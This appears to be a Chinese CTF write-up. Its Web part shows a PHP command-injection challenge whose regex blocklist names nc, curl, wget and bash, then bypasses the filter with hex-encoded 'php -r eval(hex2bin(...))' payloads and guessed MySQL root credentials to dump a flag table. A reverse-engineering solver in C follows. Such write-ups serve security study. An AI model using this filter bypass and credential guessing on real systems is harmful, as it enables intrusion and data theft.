Web
Simple_php
这个Simple_php一点儿也不Simple (⋟﹏⋞)
源码放这儿了:
<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);
if(isset($_POST['cmd'])){
$cmd = escapeshellcmd($_POST['cmd']);
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
system($cmd);
}
}
show_source(__FILE__);
?>
很明显,POST一个cmd进去,然后通过escapeshellcmd函数对参数进行转义,然后进行逆天的正则,之后RCE。
大概就是这样,还能干啥?全都给过滤了,还能咋绕过?
首先是信息搜集,不过有用的似乎没多少,查看进程发现一个MySQL的进程,可以试着打一下MySQL:
mysql 277 0.0 16.9 1083992 89076 pts/0 Sl+ 07:38 0:00 /usr/sbin/mariadbd --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/run/mysqld/mysqld.sock
看来是攻击MySQL了,猜测用户是root,密码随便猜,这道题也是root,运气好,猜中了,那么,先查数据库:
//构造这个查询语句
echo `mysql -uroot -proot -e "SHOW DATABASES"`;
//payload
cmd=php+-r+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253484f572044415441424153455322603b,2)));
//结果
Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c45435420534348454d415f4e414d45204153205048505f434d532046524f4d20494e464f524d4154494f4e5f534348454d412e534348454d4154413b22603b - assumed 'aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c45435420534348454d415f4e414d45204153205048505f434d532046524f4d20494e464f524d4154494f4e5f534348454d412e534348454d4154413b22603b' (this will throw an Error in a future version of PHP) in Command line code on line 1
PHP_CMS
information_schema
mysql
performance_schema
PHP_CMS
//构造这个查询语句
echo `mysql -uroot -proot -e "select table_name as PHP_CMS from information_schema.TABLES where TABLE_SCHEMA='PHP_CMS'"`;
//payload
cmd=php+-r+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b,2)));
//结果
Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b - assumed 'aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202273656c656374207461626c655f6e616d65206173205048505f434d532066726f6d20696e666f726d6174696f6e5f736368656d612e5441424c4553207768657265205441424c455f534348454d413d275048505f434d532722603b' (this will throw an Error in a future version of PHP) in Command line code on line 1
PHP_CMS
F1ag_Se3Re7
查一下这个F1ag_Se3Re7,不出意外的话,应该flag在这里面:
//构造这个查询语句
echo `mysql -uroot -proot -e "SELECT * FROM PHP_CMS.F1ag_Se3Re7"`;
//payload
cmd=php+-r+eval(hex2bin(substr(aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b,2)));
//结果
Warning: Use of undefined constant aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b - assumed 'aa6563686f20606d7973716c202d75726f6f74202d70726f6f74202d65202253454c454354202a2046524f4d205048505f434d532e463161675f53653352653722603b' (this will throw an Error in a future version of PHP) in Command line code on line 1
id f1ag66_2024
1 flag{e784d525-93a1-466b-9f22-38a3add54dfe}
flag:flag{e784d525-93a1-466b-9f22-38a3add54dfe}
补充:
1.因为存在escapeshellcmd函数,所以在转义之后,在system函数中,"在经过hex2bin之后,就能够表示字符串"本身
2.在构造substr的时候,第一个参数没有引号也能正常使用,只是会出现一个报错
Re
asm_re
ex
数据段,数据段分配内存,每一个数据段会获得2个内存单元
计算机采用小端存储,小端字节序存储:把一个数据的低位字节的内容,存储在低地址处,把高位字节的内容,存储在高地址处;
数据段:存放数据的段。使用时候,用DS寄存器
大于一个字节长度的16进制数据进行高低位分割之后进行传输
DCB:用于分配一片连续的字节存储单元并用指定的数据初始化
DCB表示:它分配一段字节的内存单元,它每个操作数都占有一个字节,操作数范围为-128~255的数值或字符串。
关键部分
#include<stdio.h>
int main()
{
char flag[100];
int data[] = {0x1FD7, 0x21B7, 0x1E47, 0x2027, 0x26E7, 0x10D7, 0x1127, 0x2007, 0x11c7, 0x1e47, 0x1017, 0x1017,
0x11f7, 0x2007, 0x1037, 0x1107, 0x1f17, 0x10d7, 0x1017, 0x1017, 0x1f67, 0x1017, 0x11c7, 0x11c7, 0x1017,
0x1fd7, 0x1f17, 0x1107, 0xf47, 0x1127, 0x1037, 0x1e47, 0x1037, 0x1fd7, 0x1107, 0x1fd7, 0x1107, 0x2787};
int len;
len=sizeof(data)/sizeof(data[0]);
int index=0;
for(int j=0;j<len;j++)
{
for(int i=32;i<128;i++)
{
if((((i*0x50+0x14)^0x4D)+0x1E)==data[j])
{
flag[index++]=(char)i;
break;
}
}
}
flag[index]='\0';//char型
puts(flag);
//flag{67e9a228e45b622c2992fb5174a4f5f5}
return 0;
}
Pwn
Crypto
古密